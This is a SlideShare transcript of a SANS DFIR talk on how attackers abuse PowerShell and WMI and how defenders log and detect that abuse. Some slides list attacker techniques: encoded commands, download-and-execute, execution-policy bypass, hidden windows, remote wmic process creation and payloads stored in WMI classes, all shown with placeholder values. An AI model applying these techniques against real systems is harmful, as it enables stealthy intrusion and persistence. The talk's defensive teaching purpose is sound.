Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SANS DFIR Prague: PowerShell & WMI

817 views

Published on

My presentation from SANS DFIR Summit covering PowerShell and WMI.

Published in: Technology
  • Be the first to comment

SANS DFIR Prague: PowerShell & WMI

  1. 1. • Quick Background • Malicious Possibilities • Real-World Examples • Detection & Defense
  2. 2. • Joe Slowik, Adversary Hunter • Current: Dragos Adversary Hunter • Previous: • Los Alamos National Lab: IR Lead • US Navy: Information Warfare Officer • University of Chicago: Philosophy Drop-Out
  3. 3. • Scripting and interactive language • Introduced in 2006, integral to Win7+ since 2009 • Full access to COM & WMI for system administration
  4. 4. • WMI = Windows Management Instrumentation • Interactive and scriptable framework for local and remote administration • Frequently accessed via PowerShell
  5. 5. http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
  6. 6. http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
  7. 7. http://www.opentechguides.com/how-to/article/powershell/132/get- system-info-remotely.html
  8. 8. https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
  9. 9. http://www.freeiconspng.co m/img/17209 • PowerShell is a powerful, useful tool for network administration • Widely used in Windows Enterprise environments
  10. 10. • WMI enables significant access to review and modify system data • Access via PowerShell allows for scripting and automated possibilities
  11. 11. • PowerShell’s ubiquity adds a significant capability to potential attacker • Enhances ability to ‘live off the land’ • Expands initial infection vectors
  12. 12. Command Use -EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile() Download a file from a remote location; can be piped to Start-Process to execute -ExecutionPolicy Bypass Circumvent system limits on script execution -WindowStyle Hidden Hide the command window from the user -Invoke-Expression Execute arbitrary code or commands
  13. 13. Delivery Vectors VBA VBS BAT JS Registry Startup .lnk
  14. 14. https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
  15. 15. • WMI is also ubiquitous, potent ‘dual-use’ • Can enable: • Complex exploitation, persistence of infected host • New vectors to pivot within network
  16. 16. • PsExec-like remote execution • Malicious file/script storage • Persistence when combined with file or registry activity
  17. 17. • Pentesting frameworks • Crimeware/Commodity malware • APT
  18. 18. • Malicious VBA decodes to PowerShell • Retrieves, then executes ransomware payload
  19. 19. • WMI filter retrieved on schedule • Returns base64-encoded PowerShell • PowerShell re-launches backdoor https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
  20. 20. https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
  21. 21. CMD •Command execution •Execution Parameters PowerShell •Interactive and Scripts •Flags, Modifiers, full Visibility WMI • Log Events • Correlate with Other Activity
  22. 22. What is required to achieve ‘bad’? Process Execution Persistence Encode Decode Download Upload
  23. 23. • Sysinternals Sysmon • Windows Loggging Service (WLS) • WMI Logging via WMI Subscription • PowerShell Logging • Proprietary Host-based Security
  24. 24. • WLS incorporates PowerShell logging natively • Otherwise: • Windows 7+ • Powershell 5.0+ • Enable logging! • See: • https://www.fireeye.com/blog/threat- research/2016/02/greater_visibilityt.html
  25. 25. • Sysinternals Sysmon – latest version includes WMI visibility • But logging/alerting will need to be tuned • DIY via WMI Subscription creation • Otherwise – commercial products
  26. 26. Establish Visibility Baseline ‘Normal’ Identify Malicious Create Alerts & Alarms Develop Response
  27. 27. • What PowerShell/WMI scripts are used in ‘normal’ network administration? • What commands never have legitimate use? • What – if any – items require whitelisting?
  28. 28. wmic /node:REMOTESYSTEM process call create “EVIL_COMMAND” SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE “%VMware%” $BADTHING=New-ObjectManagement.ManagementClass($REMOTESYSTEM, [String]::Empty,$null) $BADTHING[‘__CLASS’]=’Evil_Malware’ $BADTHING.Properties.Add(‘SomethingEvil’,[Management.CimType] ::String,$False) $BADTHING.Properties[‘SomethingEvil’].Value =$PAYLOAD $EvilClass.Put()
  29. 29. • Create Event Consumer: performs action when triggered by event • Pair with Event Filter: events of interest • Filter to Consumer Binding: bind filter to consumer • Export results to log file, data store • Credit: https://www.fireeye.com/blog/threat- research/2016/08/wmi_vs_wmi_monitor.html

×